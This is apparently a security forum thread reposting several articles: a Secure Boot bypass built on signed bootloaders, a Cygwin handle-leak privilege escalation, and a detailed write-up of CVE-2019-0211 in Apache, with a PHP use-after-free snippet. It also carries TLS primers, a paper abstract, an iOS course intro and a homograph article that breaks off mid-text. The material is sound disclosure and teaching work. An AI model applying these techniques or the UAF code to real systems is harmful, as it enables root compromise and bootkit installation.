tivoization restriction license rule, therefore >GRUB cannot be signed. To address this issue, Linux Foundation released PreLoader and Matthew Garrett made shim—small bootloaders that verify the signature or hash of a single file and execute it. PreLoader and shim do not use UEFI db certificate store, but contain a database of allowed hashes (PreLoader) or certificates (shim) inside the executable file. Both programs, in addition to automatically executing trusted files, allow you to run any previously untrusted programs in Secure Boot mode, but require the physical presence of the user. When executed for the first time, you need to select a certificate to be added or the file to be hashed in the graphical interface, after which the data is added into a special NVRAM variable on the motherboard which is not accessible from the loaded operating system. Files become trusted only for these pre-loaders, not for Secure Boot in general, and still couldn't be loaded without PreLoader or shim. Untrusted software first boot with shim. All modern popular Linux distributions use shim due to certificate support, which makes it easy to provide updates for the main bootloader without the need for user interaction. In general, shim is used to run GRUB2 — the most popular bootloader in Linux. GRUB2 To prevent signed bootloader abuse with malicious intentions, Red Hat created patches for GRUB2 that block «dangerous» functions when Secure Boot is enabled: insmod/rmmod, appleloader, linux (replaced by linuxefi) ,multiboot, xnu, memrw, iorw. The chainloader module, which loads arbitrary .efi-files, introduced its own custom internal .efi (PE) loader without using the UEFI LoadImage/StartImage functions, as well as the validation code of the loaded files via shim, in order to preserve the ability to load files trusted by shim but not trusted in terms of UEFI. It's not exactly clear why this method is preferable—UEFI allows one to redefine (hook) UEFI verification functions, this is how PreLoader works, and indeed in the very shim feature is presented but disabled by default. Anyway, using the signed GRUB from some Linux distribution does not suit our needs. There are two ways to create a universal bootable flash drive that would not require adding the keys of each executable file to the trusted files: Use modded GRUB with internal EFI loader, without digital signature vertification or module restrictions; Use custom pre-loader (the second one) which hook UEFI file vertification functions (EFI_SECURITY_ARCH_PROTOCOL.FileAuthenticationState, EFI_SECURITY2_ARCH_PROTOCOL.FileAuthentication) The second method is preferable as executed software can load and start another software, for example, UEFI shell can execute any program. The first method does not provide this, allowing only GRUB to execute arbitrary files. Let's modify PreLoader by removing all unnecessary features and patch verification code to allow everything. Disk architecture is as follows: ______ ______ ______ ╱│ │ ╱│ │ ╱│ │ /_│ │ → /_│ │ → /_│ │ │ │ → │ │ → │ │ │ EFI │ → │ EFI │ → │ EFI │ │_______│ │_______│ │_______│ BOOTX64.efi grubx64.efi grubx64_real.efi (shim) (FileAuthentication (GRUB2) override) ↓↓↓ ↑ ↑ ______ ↑ ╱│ │ ║ /_│ │ ║ │ │ ═══════════╝ │ EFI │ │_______│ MokManager.efi (Key enrolling tool) This is how Super UEFIinSecureBoot Disk has been made. Super UEFIinSecureBoot Disk is a bootable image with GRUB2 bootloader designed to be used as a base for recovery USB flash drives. Key feature: disk is fully functional with UEFI Secure Boot mode activated. It can launch any operating system or .efi file, even with untrusted, invalid or missing signature. The disk could be used to run various Live Linux distributions, WinPE environment, network boot, without disabling Secure Boot mode in UEFI settings, which could be convenient for performing maintenance of someone else's PC and corporate laptops, for example, with UEFI settings locked with a password. The image contains 3 components: shim pre-loader from Fedora (signed with Microsoft key which is pre-installed in most motherboards and laptops), modified Linux Foundation PreLoader (disables digital signature verification of executed files), and modified GRUB2 loader. On the first boot it's necessary to select the certificate using MokManager (starts automatically), after that everything will work just as with Secure Boot disabled—GRUB loads any unsigned .efi file or Linux kernel, executed EFI programs can load any other untrusted executables or drivers. To demonstrate disk functions, the image contains Super Grub Disk (a set of scripts to search and execute OS even if the bootloader is broken), GRUB Live ISO Multiboot (a set of scripts to load Linux Live distros directly from ISO file), One File Linux (the kernel and initrd in a single file, for system recovery) and several UEFI utilities. The disk is also compatible with UEFI without Secure Boot and with older PCs with BIOS. Signed bootloaders I was wondering is it possible to bypass first boot key enrollment through shim. Could there be some signed bootloaders that allow you to do more than the authors expected? As it turned out—there are such loaders. One of them is used in Kaspersky Rescue Disk 18—antivirus software boot disk. GRUB from the disk allows you to load modules (the insmod command), and module in GRUB is just an executable code. The pre-loader on the disk is a custom one. Of course, you can't just use GRUB from the disk to load untrusted code. It is necessary to modify the chainloader module so that GRUB does not use the UEFI LoadImage/StartImage functions, but instead self-loads the .efi file into memory, performs relocation, finds the entry point and jumps to it. Fortunately, almost all the necessary code is present in Red Hat GRUB Secure Boot repository, the only problem—PE header parser is missing. GRUB gets parsed header from shim, in a response to a function call via a special protocol. This could be easily fixed by porting the appropriate code from the shim or PreLoader to GRUB. This is how Silent UEFIinSecureBoot Disk has been made. The final disk architecture looks as follows: ______ ______ ______ ╱│ │ ╱│ │ ╱│ │ /_│ │ /_│ │ → /_│ │ │ │ │ │ → │ │ │ EFI │ │ EFI │ → │ EFI │ │_______│ │_______│ │_______│ BOOTX64.efi grubx64.efi grubx64_real.efi (Kaspersky (FileAuthentication (GRUB2) Loader) override) ↓↓↓ ↑ ↑ ______ ↑ ╱│ │ ║ /_│ │ ║ │ │ ═══════════╝ │ EFI │ │_______│ fde_ld.efi + custom chain.mod (Kaspersky GRUB2) The end In this article we proved the existence of not enough reliable bootloaders signed by Microsoft key, which allows booting untrusted code in Secure Boot mode. Using signed Kaspersky Rescue Disk files, we achieved a silent boot of any untrusted .efi files with Secure Boot enabled, without the need to add a certificate to UEFI db or shim MOK. These files can be used both for good deeds (for booting from USB flash drives) and for evil ones (for installing bootkits without computer owner consent). I assume that Kaspersky bootloader signature certificate will not live long, and it will be added to global UEFI certificate revocation list, which will be installed on computers running Windows 10 via Windows Update, breaking Kaspersky Rescue Disk 18 and Silent UEFIinSecureBoot Disk. Let's see how soon this would happen. Super UEFIinSecureBoot Disk download: https://github.com/ValdikSS/Super-UEFIinSecureBoot-Disk Silent UEFIinSecureBoot Disk download (ZeroNet Git Center network): http://127.0.0.1:43110/1KVD7PxZVke1iq4DKb4LNwuiHS4UzEAdAv/ About ZeroNet Sursa: https://habr.com/en/post/446238/
      • 1
      • Upvote
  6. Exploiting a privileged zombie process handle leak on Cygwin March 29th, 2019 Vulnerability Two months ago, I was playing with Cygwin and I noticed that all Cygwin processes inherited dead process handles using Process Hacker: Bash.exe process spawned by SSH daemon after a successful connection (1) runs with a newly created token as limited test user. Indeed, Cygwin SSHD worked at the time with an administrator account (cyg_server) emulating set(e)uid by creating a new user token using undocumented NtCreateToken. See Cygwin documentation for more information about the change with version 3.0. The same bash.exe process inherits 3 handles of non-existent processes with full access rights (2). Tracing the process creation and termination with Process Monitor during the SSH connection revealed that these leaked handles are actually privileged process (3) running as cyg_server. Exploitation So what can we do with privileged zombie process handles, since we have full access (PROCESS_ALL_ACCESS) we can: Access Right Possible action OpenProcessToken FAIL Access denied PROCESS_VM_OPERATION FAIL: Any VM operation will fail because the process does not have a address space anymore PROCESS_CREATE_THREAD FAIL: Same problem, no address space, creating thread in the process will NOT work PROCESS_DUP_HANDLE FAIL: Access denied on DuplicateHandle (not sure why :D) PROCESS_CREATE_PROCESS SUCCESS: Finally! Let’s see how to use this privilege: When creating a process, the attribute PROC_THREAD_ATTRIBUTE_PARENT_PROCESS in STARTUPINFO structure allows the calling process to use a different process as the parent for the process being created. The calling process must have PROCESS_CREATE_PROCESS access right on the process handle used as the parent. From Windows documentation: Attributes inherited from the specified process include handles, the device map, processor affinity, priority, quotas, the process token, and job object. So the spawned process will use the privileged token thus it will run as cyg_server: This exploitation technique is not new and there are maybe other ways to exploit this case but I wanted to show a real world example of create process with parent handle instead of just posting about it. I find it cleaner than injecting a shellcode in a privileged process to spawn a process. Exploit source Fix The vulnerability is now fixed with Cygwin version 3.0 thanks to the maintainers that were very responsive. Commit 1: Restricting permissions Commit 2: Restricting permissions on exec Commit 3: Removing the handle inheritance Sursa: https://masthoon.github.io/exploit/2019/03/29/cygeop.html
  7. Web Security Academy Welcome to the Web Security Academy. This is a brand new learning resource providing free training on web security vulnerabilities, techniques for finding and exploiting bugs, and defensive measures for avoiding them. The Web Security Academy contains high-quality learning materials, interactive vulnerability labs, and video tutorials. You can learn at your own pace, wherever and whenever suits you. Best of all, everything is free! To access the vulnerability labs and track your progress, you'll just need to log in. Sign up if you don't have an account already. To get things started, we're covering four of the most serious "classic" vulnerabilities: SQL injection Cross-site scripting (XSS) OS command injection File path traversal (directory traversal) Over the coming months, we'll be adding a series of further topics and a large number of new vulnerability labs. The team behind the Web Security Academy includes Dafydd Stuttard, author of The Web Application Hacker's Handbook. Sursa: https://portswigger.net/web-security
  8. CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation 2019-04-03 Introduction From version 2.4.17 (Oct 9, 2015) to version 2.4.38 (Apr 1, 2019), Apache HTTP suffers from a local root privilege escalation vulnerability due to an out-of-bounds array access leading to an arbitrary function call. The vulnerability is triggered when Apache gracefully restarts (apache2ctl graceful). In standard Linux configurations, the logrotate utility runs this command once a day, at 6:25AM, in order to reset log file handles. The vulnerability affects mod_prefork, mod_worker and mod_event. The following bug description, code walkthrough and exploit target mod_prefork. Bug description In MPM prefork, the main server process, running as root, manages a pool of single-threaded, low-privilege (www-data) worker processes, meant to handle HTTP requests. In order to get feedback from its workers, Apache maintains a shared-memory area (SHM), scoreboard, which contains various informations such as the workers PIDs and the last request they handled. Each worker is meant to maintain a process_score structure associated with its PID, and has full read/write access to the SHM. ap_scoreboard_image: pointers to the shared memory block (gdb) p *ap_scoreboard_image $3 = { global = 0x7f4a9323e008, parent = 0x7f4a9323e020, servers = 0x55835eddea78 } (gdb) p ap_scoreboard_image->servers[0] $5 = (worker_score *) 0x7f4a93240820 Example of shared memory associated with worker PID 19447 (gdb) p ap_scoreboard_image->parent[0] $6 = { pid = 19447, generation = 0, quiescing = 0 '\000', not_accepting = 0 '\000', connections = 0, write_completion = 0, lingering_close = 0, keep_alive = 0, suspended = 0, bucket = 0 <- index for all_buckets } (gdb) ptype *ap_scoreboard_image->parent type = struct process_score { pid_t pid; ap_generation_t generation; char quiescing; char not_accepting; apr_uint32_t connections; apr_uint32_t write_completion; apr_uint32_t lingering_close; apr_uint32_t keep_alive; apr_uint32_t suspended; int bucket; <- index for all_buckets } When Apache gracefully restarts, its main process kills old workers and replaces them by new ones. At this point, every old worker's bucket value will be used by the main process to access an array of his, all_buckets. all_buckets (gdb) p $index = ap_scoreboard_image->parent[0]->bucket (gdb) p all_buckets[$index] $7 = { pod = 0x7f19db2c7408, listeners = 0x7f19db35e9d0, mutex = 0x7f19db2c7550 } (gdb) ptype all_buckets[$index] type = struct prefork_child_bucket { ap_pod_t *pod; ap_listen_rec *listeners; apr_proc_mutex_t *mutex; <-- } (gdb) ptype apr_proc_mutex_t apr_proc_mutex_t { apr_pool_t *pool; const apr_proc_mutex_unix_lock_methods_t *meth; <-- int curr_locked; char *fname; ... } (gdb) ptype apr_proc_mutex_unix_lock_methods_t apr_proc_mutex_unix_lock_methods_t { ... apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <-- ... } No bound checks happen. Therefore, a rogue worker can change its bucket index and make it point to the shared memory, in order to control the prefork_child_bucket structure upon restart. Eventually, and before privileges are dropped, mutex->meth->child_init() is called. This results in an arbitrary function call as root. Vulnerable code We'll go through server/mpm/prefork/prefork.c to find out where and how the bug happens. A rogue worker changes its bucket index in shared memory to make it point to a structure of his, also in SHM. At 06:25AM the next day, logrotate requests a graceful restart from Apache. Upon this, the main Apache process will first kill workers, and then spawn new ones. The killing is done by sending SIGUSR1 to workers. They are expected to exit ASAP. Then, prefork_run() (L853) is called to spawn new workers. Since retained->mpm->was_graceful is true (L861), workers are not restarted straight away. Instead, we enter the main loop (L933) and monitor dead workers' PIDs. When an old worker dies, ap_wait_or_timeout() returns its PID (L940). The index of the process_score structure associated with this PID is stored in child_slot (L948). If the death of this worker was not fatal (L969), make_child() is called with ap_get_scoreboard_process(child_slot)->bucket as a third argument (L985). As previously said, bucket's value has been changed by a rogue worker. make_child() creates a new child, fork()ing (L671) the main process. The OOB read happens (L691), and my_bucket is therefore under the control of an attacker. child_main() is called (L722), and the function call happens a bit further (L433). SAFE_ACCEPT(<code>) will only execute <code> if Apache listens on two ports or more, which is often the case since a server listens over HTTP (80) and HTTPS (443). Assuming <code> is executed, apr_proc_mutex_child_init() is called, which results in a call to (*mutex)->meth->child_init(mutex, pool, fname) with mutex under control. Privileges are dropped a bit later in the execution (L446). Exploitation The exploitation is a four step process: 1. Obtain R/W access on a worker process 2. Write a fake prefork_child_bucket structure in the SHM 3. Make all_buckets[bucket] point to the structure 4. Await 6:25AM to get an arbitrary function call Advantages: - The main process never exits, so we know where everything is mapped by reading /proc/self/maps (ASLR/PIE useless) - When a worker dies (or segfaults), it is automatically restarted by the main process, so there is no risk of DOSing Apache Problems: - PHP does not allow to read/write /proc/self/mem, which blocks us from simply editing the SHM - all_buckets is reallocated after a graceful restart (!) 1. Obtain R/W access on a worker process PHP UAF 0-day Since mod_prefork is often used in combination with mod_php, it seems natural to exploit the vulnerability through PHP. CVE-2019-6977 would be a perfect candidate, but it was not out when I started writing the exploit. I went with a 0day UAF in PHP 7.x (which seems to work in PHP5.x as well): PHP UAF <?php class X extends DateInterval implements JsonSerializable { public function jsonSerialize() { global $y, $p; unset($y[0]); $p = $this->y; return $this; } } function get_aslr() { global $p, $y; $p = 0; $y = [new X('PT1S')]; json_encode([1234 => &$y]); print("ADDRESS: 0x" . dechex($p) . "\n"); return $p; } get_aslr(); This is an UAF on a PHP object: we unset $y[0] (an instance of X), but it is still usable using $this. UAF to Read/Write We want to achieve two things: - Read memory to find all_buckets' address - Edit the SHM to change bucket index and add our custom mutex structure Luckily for us, PHP's heap is located before those two in memory. Memory addresses of PHP's heap, ap_scoreboard_image->* and all_buckets root@apaubuntu:~# cat /proc/6318/maps | grep libphp | grep rw-p 7f4a8f9f3000-7f4a8fa0a000 rw-p 00471000 08:02 542265 /usr/lib/apache2/modules/libphp7.2.so (gdb) p *ap_scoreboard_image $14 = { global = 0x7f4a9323e008, parent = 0x7f4a9323e020, servers = 0x55835eddea78 } (gdb) p all_buckets $15 = (prefork_child_bucket *) 0x7f4a9336b3f0 Since we're triggering the UAF on a PHP object, any property of this object will be UAF'd too; we can convert this zend_object UAF into a zend_string one. This is useful because of zend_string's structure: (gdb) ptype zend_string type = struct _zend_string { zend_refcounted_h gc; zend_ulong h; size_t len; char val[1]; } The len property contains the length of the string. By incrementing it, we can read and write further in memory, and therefore access the two memory regions we're interested in: the SHM and Apache's all_buckets. Locating bucket indexes and all_buckets We want to change ap_scoreboard_image->parent[worker_id]->bucket for a certain worker_id. Luckily, the structure always starts at the beginning of the shared memory block, so it is easy to locate. Shared memory location and targeted process_score structures root@apaubuntu:~# cat /proc/6318/maps | grep rw-s 7f4a9323e000-7f4a93252000 rw-s 00000000 00:05 57052 /dev/zero (deleted) (gdb) p &ap_scoreboard_image->parent[0] $18 = (process_score *) 0x7f4a9323e020 (gdb) p &ap_scoreboard_image->parent[1] $19 = (process_score *) 0x7f4a9323e044 To locate all_buckets, we can make use of our knowledge of the prefork_child_bucket structure. We have: Important structures of bucket items prefork_child_bucket { ap_pod_t *pod; ap_listen_rec *listeners; apr_proc_mutex_t *mutex; <-- } apr_proc_mutex_t { apr_pool_t *pool; const apr_proc_mutex_unix_lock_methods_t *meth; <-- int curr_locked; char *fname; ... } apr_proc_mutex_unix_lock_methods_t { unsigned int flags; apr_status_t (*create)(apr_proc_mutex_t *, const char *); apr_status_t (*acquire)(apr_proc_mutex_t *); apr_status_t (*tryacquire)(apr_proc_mutex_t *); apr_status_t (*release)(apr_proc_mutex_t *); apr_status_t (*cleanup)(void *); apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <-- apr_status_t (*perms_set)(apr_proc_mutex_t *, apr_fileperms_t, apr_uid_t, apr_gid_t); apr_lockmech_e mech; const char *name; } all_buckets[0]->mutex will be located in the same memory region as all_buckets[0]. Since meth is a static structure, it will be located in libapr's .data. Since meth points to functions defined in libapr, each of the function pointers will be located in libapr's .text. Since we have knowledge of those region's addresses through /proc/self/maps, we can go through every pointer in Apache's memory and find one that matches the structure. It will be all_buckets[0]. As I mentioned, all_buckets's address changes at every graceful restart. This means that when our exploit triggers, all_buckets's address will be different than the one we found. This has to be taken into account; we'll talk about this later. 2. Write a fake prefork_child_bucket structure in the SHM Reaching the function call The code path to the arbitrary function call is the following: bucket_id = ap_scoreboard_image->parent[id]->bucket my_bucket = all_buckets[bucket_id] mutex = &my_bucket->mutex apr_proc_mutex_child_init(mutex) (*mutex)->meth->child_init(mutex, pool, fname) Calling something proper To exploit, we make (*mutex)->meth->child_init point to zend_object_std_dtor(zend_object *object), which yields the following chain: mutex = &my_bucket->mutex [object = mutex] zend_object_std_dtor(object) ht = object->properties zend_array_destroy(ht) zend_hash_destroy(ht) val = &ht->arData[0]->val ht->pDestructor(val) pDestructor is set to system, and &ht->arData[0]->val is a string. As you can see, both leftmost structures are superimposed. 3. Make all_buckets[bucket] point to the structure Problem and solution Right now, if all_buckets' address was unchanged in between restarts, our exploit would be over: Get R/W over all memory after PHP's heap Find all_buckets by matching its structure Put our structure in the SHM Change one of the process_score.bucket in the SHM so that all_bucket[bucket]->mutex points to our payload As all_buckets' address changes, we can do two things to improve reliability: spray the SHM and use every process_score structure - one for each PID. Spraying the shared memory If all_buckets' new address is not far from the old one, my_bucket will point close to our structure. Therefore, instead of having our prefork_child_bucket structure at a precise point in the SHM, we can spray it all over unused parts of the SHM. The problem is that the structure is also used as a zend_object, and therefore it has a size of (5 * 8 😃 40 bytes to include zend_object.properties. Spraying a structure that big over a space this small won't help us much. To solve this problem, we superimpose the two center structures, apr_proc_mutex_t and zend_array, and spray their address in the rest of the shared memory. The impact will be that prefork_child_bucket.mutex and zend_object.properties point to the same address. Now, if all_bucket is relocated not too far from its original address, my_bucket will be in the sprayed area. Using every process_score Each Apache worker has an associated process_score structure, and with it a bucket index. Instead of changing one process_score.bucket value, we can change every one of them, so that they cover another part of memory. For instance: ap_scoreboard_image->parent[0]->bucket = -10000 -> 0x7faabbcc00 <= all_buckets <= 0x7faabbdd00 ap_scoreboard_image->parent[1]->bucket = -20000 -> 0x7faabbdd00 <= all_buckets <= 0x7faabbff00 ap_scoreboard_image->parent[2]->bucket = -30000 -> 0x7faabbff00 <= all_buckets <= 0x7faabc0000 This multiplies our success rate by the number of apache workers. Upon respawn, only one worker have a valid bucket number, but this is not a problem because the others will crash, and immediately respawn. Success rate Different Apache servers have different number of workers. Having more workers mean we can spray the address of our mutex over less memory, but it also means we can specify more index for all_buckets. This means that having more workers improves our success rate. After a few tries on my test Apache server of 4 workers (default), I had ~80% success rate. The success rate jumps to ~100% with more workers. Again, if the exploit fails, it can be restarted the next day as Apache will still restart properly. Apache's error.log will nevertheless contain notifications about its workers segfaulting. 4. Await 6:25AM for the exploit to trigger Well, that's the easy step. Vulnerability timeline 2019-02-22 Initial contact email to security[at]apache[dot]org, with description and POC 2019-02-25 Acknowledgment of the vulnerability, working on a fix 2019-03-07 Apache's security team sends a patch for I to review, CVE assigned 2019-03-10 I approve the patch 2019-04-01 Apache HTTP version 2.4.39 released Apache's team has been prompt to respond and patch, and nice as hell. Really good experience. PHP never answered regarding the UAF. Questions Why the name ? CARPE: stands for CVE-2019-0211 Apache Root Privilege Escalation DIEM: the exploit triggers once a day I had to. Can the exploit be improved ? Yes. For instance, my computations for the bucket indexes are shaky. This is between a POC and a proper exploit. BTW, I added tons of comments, it is meant to be educational as well. Does this vulnerability target PHP ? No. It targets the Apache HTTP server. Exploit The exploit will be disclosed at a later date. Sursa: https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html
  9. TLS Security 1: What Is SSL/TLS Posted on April 3, 2019 by Agathoklis Prodromou Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are cryptographic security protocols. They are used to make sure that network communication is secure. Their main goals are to provide data integrity and communication privacy. The SSL protocol was the first protocol designed for this purpose and TLS is its successor. SSL is now considered obsolete and insecure (even its latest version), so modern browsers such as Chrome or Firefox use TLS instead. SSL and TLS are commonly used by web browsers to protect connections between web applications and web servers. Many other TCP-based protocols use TLS/SSL as well, including email (SMTP/POP3), instant messaging (XMPP), FTP, VoIP, VPN, and others. Typically, when a service uses a secure connection the letter S is appended to the protocol name, for example, HTTPS, SMTPS, FTPS, SIPS. In most cases, SSL/TLS implementations are based on the OpenSSL library. SSL and TLS are frameworks that use a lot of different cryptographic algorithms, for example, RSA and various Diffie–Hellman algorithms. The parties agree on which algorithm to use during initial communication. The latest TLS version (TLS 1.3) is specified in the IETF (Internet Engineering Task Force) document RFC 8446 and the latest SSL version (SSL 3.0) is specified in the IETF document RFC 6101. Privacy & Integrity SSL/TLS protocols allow the connection between two mediums (client-server) to be encrypted. Encryption lets you make sure that no third party is able to read the data or tamper with it. Unencrypted communication can expose sensitive data such as user names, passwords, credit card numbers, and more. If we use an unencrypted connection and a third party intercepts our connection with the server, they can see all information exchanged in plain text. For example, if we access the website administration panel without SSL, and an attacker is sniffing local network traffic, they see the following information. The cookie that we use to authenticate on our website is sent in plain text and anyone who intercepts the connection can see it. The attacker can use this information to log into our website administration panel. From then on, the attacker’s options expand dramatically. However, if we access our website using SSL/TLS, the attacker who is sniffing traffic sees something quite different. In this case, the information is useless to the attacker. Identification SSL/TLS protocols use public-key cryptography. Except for encryption, this technology is also used to authenticate communicating parties. This means, that one or both parties know exactly who they are communicating with. This is crucial for such applications as online transactions because must be sure that we are transferring money to the person or company who are who they claim to be. When a secure connection is established, the server sends its SSL/TSL certificate to the client. The certificate is then checked by the client against a trusted Certificate Authority, validating the server’s identity. Such a certificate cannot be falsified, so the client may be one hundred percent sure that they are communicating with the right server. Perfect Forward Secrecy Perfect forward secrecy (PFS) is a mechanism that is used to protect the client if the private key of the server is compromised. Thanks to PFS, the attacker is not able to decrypt any previous TLS communications. To ensure perfect forward secrecy, we use new keys for every session. These keys are valid only as long as the session is active. TLS Security 2 Learn about the history of SSL/TLS and protocol versions: SSL 2.0, SSL 3.0, TLS 1.0, TLS 1.1, and TLS 1.2. TLS Security 3 Learn about SSL/TLS terminology and basics, for example, encryption algorithms, cipher suites, message authentication, and more. TLS Security 4 Learn about SSL/TLS certificates, certificate authorities, and how to generate certificates. TLS Security 5 Learn how a TLS connection is established including key exchange, TLS handshakes, and more. TLS Security 6 Learn about TLS vulnerabilities and attacks such as POODLE, BEAST, CRIME, BREACH, and Heartbleed. Agathoklis Prodromou Web Systems Administrator/Developer Akis has worked in the IT sphere for more than 13 years, developing his skills from a defensive perspective as a System Administrator and Web Developer but also from an offensive perspective as a penetration tester. He holds various professional certifications related to ethical hacking, digital forensics and incident response. Sursa: https://www.acunetix.com/blog/articles/tls-security-what-is-tls-ssl-part-1/
      • 1
      • Upvote
  10. Selfie: reflections on TLS 1.3 with PSK Nir Drucker and Shay Gueron University of Haifa, Israel,andAmazon, Seattle, USA Abstract. TLS 1.3 allows two parties to establish a shared session keyfrom an out-of-band agreed Pre Shared Key (PSK). The PSK is usedto mutually authenticate the parties, under the assumption that it isnot shared with others. This allows the parties to skip the certificateverification steps, saving bandwidth, communication rounds, and latency.We identify a security vulnerability in this TLS 1.3 path, by showing anew reflection attack that we call “Selfie”. TheSelfieattack breaks themutual authentication. It leverages the fact that TLS does not mandateexplicit authentication of the server and the client in every message.The paper explains the root cause of this TLS 1.3 vulnerability, demon-strates theSelfieattack on the TLS implementation of OpenSSL andproposes appropriate mitigation.The attack is surprising because it breaks some assumptions and uncoversan interesting gap in the existing TLS security proofs. We explain the gapin the model assumptions and subsequently in the security proofs. Wealso provide an enhanced Multi-Stage Key Exchange (MSKE) model thatcaptures the additional required assumptions of TLS 1.3 in its currentstate. The resulting security claims in the case of external PSKs areaccordingly different. Sursa: https://eprint.iacr.org/2019/347.pdf
      • 1
      • Upvote
  11. Reverse Engineering iOS Applications Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest for application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂 All the vulnerabilities that I'll show you here are real, they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is because most of the companies prohibit the publication of such content. We've helped these companies by reporting them these issues and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course, by creating a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed to teach you common issues on iOS applications, I felt like we needed one that showed the kind of vulnerabilities we've seen on applications downloaded from the App Store. This course is divided in 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success. This is my first attempt to creating an online course so bear with me if it's not the best. I love feedback and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b! If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn! Modules Prerequisites Introduction Module 1 - Environment Setup Module 2 - Decrypting iOS Applications Module 3 - Static Analysis Module 4 - Dynamic Analysis and Hacking Module 5 - Binary Patching Final Thoughts Resources License Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Disclaimer I created this course on my own and it doesn't reflect the views of my employer, all the comments and opinions are my own. Disclaimer of Damages Use of this course or material is, at all times, "at your own risk." If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party, for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk", I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. this limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages. Privacy I'm not personally collecting any information. Since this entire course is hosted on Github, that's the privacy policy you want to read. [^1] I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser, you get to understand the static code (HTML/Javascript) of the website but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company who created the application or its end users. Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps
      • 1
      • Upvote
      • 1
      • Upvote
  12. What you see is not what you get: when homographs attack homographs, telegram, signal, security research — 01 April 2019 Introduction Since the introduction of Unicode in domain names (known as Internationalized Domain Names, or simply IDN) by ICANN over two decades ago, a series of brand new security implications were also brought into light together with the possibility of registering domain names using different alphabets and Unicode characters. When researching the feasibility of phishing and other attacks based on homographs and IDNs, mainly in the context of web application penetration testing, we stumbled upon a few curious cases where they also affected mobile applications. We then decided to investigate the prevalence of this class of vulnerability against mobile instant messengers, especially those security-oriented. This blog post offers a brief overview about homograph attacks, highlights its risks and presents a chain of two practical exploits against Signal, Telegram and Tor Browser that could lead to nearly impossible to detect phishing scenarios and also situations where more powerful exploits could be used against an opsec-aware target. What are homoglyphs and homographs? It is not uncommon for characters that belong to different alphabets to look alike. These are called homoglyphs and sometimes depending on the font they happen to get rendered in a visually indistinguishably way, making it impossible for a user to tell the difference between them. For the naked eye 'a' and 'а' looks the same (a homoglyph), but the former belongs to the Latin script and the latter to Cyrillic. While for the untrained human eye it is hard to distinguish between both of them, they may get interpreted entirely different by computers. Homographs are two strings that seem to be the same but are in fact different. Think for instance, the English word "lighter" is and written the same but has a different meaning depending on the context it is used - it can mean "a device for lighting a fire", as a noun, or the opposite of "heavier", as a verb. The strings blazeinfosec.com and blаzeinfosec.com are oftentimes rendered as homographs, but yield different results when transformed into a URL. Homoglyphs, and by extension homographs, exist among many different scripts. Latin, Greek and Cyrillic for example share numerous characters that either look exactly similar (e.g., A and А) or have a very close resemblance (e.g., P and Р). Unicode has a document that takes into consideration "confusable" characters, that have look-a-likes across different scripts. Font renderization and homoglyphs Depending on the font, the way it is rendered and also the size of the font in the display, homoglyphs and homographs may be shown either differently or completely indistinguishable from each other, as seen in CVE-2018-4277 and in the example put together by Xudong Zheng in April 2017, which highlighted the insufficient measures browsers applied against IDN homographs until then. Below are the strings https://www.apple.com (Latin) and https://www.аррӏе.com (Cyrillic) displayed in the font Tahoma, size 30: Below are the same strings now displayed in the font Bookman Old Style, size 30: The way they are rendered and displayed, Tahoma does not seem to distinguish between both of them, providing no visual indication to a user of a fraudulent website. Bookman Old Style, on the other hand, seems to at least render differently the 'l' and 'І', giving a small visual hint about the legitimacy of the URL. Internationalized Domain Names (IDN) and punycode With the advent of support for Unicode in major operating systems and applications and the fact the Internet gained popularity in countries that do not necessarily use Latin as their alphabet, in the late 1990's ICANN in introduced the first version of IDN. This meant that domain names could be represented in the characters of their native language, insted of being bound by ASCII characters. However, DNS systems do not understand Unicode and a strategy to adapt to ASCII-only systems was needed. Therefore, Punycode was invented to translate domain names containing Unicode symbols into ASCII, so DNS servers could work normally. For example, https://www.blazeinfosec.com and https://www.blаzeinfosec.com in 